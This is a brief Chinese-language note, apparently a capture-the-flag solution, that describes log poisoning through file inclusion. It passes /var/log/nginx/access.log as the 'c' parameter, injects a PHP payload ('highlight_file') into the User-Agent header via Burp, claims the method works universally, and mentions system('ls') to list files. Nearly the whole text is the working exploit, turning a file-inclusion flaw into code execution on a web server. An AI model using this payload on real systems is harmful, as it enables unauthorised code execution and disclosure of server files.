/?c=/var/log/nginx/access.log 然后burp改UA:<?php highlight_file('36d.php'); ?> 以上方案通杀。 36d.php这个路径可以通过system('ls');获取